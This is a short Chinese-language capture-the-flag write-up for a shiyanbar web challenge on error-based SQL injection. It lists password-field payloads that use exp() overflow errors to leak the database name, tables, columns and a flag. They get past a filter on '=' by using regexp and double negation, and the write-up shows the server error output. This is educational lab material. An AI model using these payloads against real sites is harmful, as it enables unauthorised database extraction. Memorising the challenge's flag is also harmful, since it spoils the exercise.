加了料的报错注入 - exp报错解法

原题链接

http://ctf5.shiyanbar.com/web/baocuo/index.php

分析

exp测试一下(因为#之类的注释符被过滤，注意闭合)：

username=&password='or exp() or '

查数据库：

username=&password=' or  exp(~(select * from(select database())x)) or'  

查表

username=&password=' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema regexp database())a)) or '  #利用这则表达式代替过滤的'='

username=&password=' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where !(table_schema <> database()))a)) or '  #利用非非逆否命题绕过 '='

DOUBLE value is out of range in 'exp(~((select 'ffll44jj,users' from dual)))'

查列名

username=&password=' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where !(table_name <> 'ffll44jj'))a)) or '  # 利用非非逆否命题绕过 '='

username=&password=' or exp(~(select * from(select group_concat(column_name) from  information_schema.columns where table_name regexp 'ffll44jj')a)) or '    #利用正则表达式绕过过滤‘=’

DOUBLE value is out of range in 'exp(~((select 'value' from dual)))'

查数据

username=&password=' or exp(~(select * from(select value from  ffll44jj)z)) or ' 

DOUBLE value is out of range in 'exp(~((select 'flag{err0r_b4sed_sqli_+_hpf}' from dual)))'

flag

flag{err0r_b4sed_sqli_+_hpf}

知识点

exp 溢出报错注入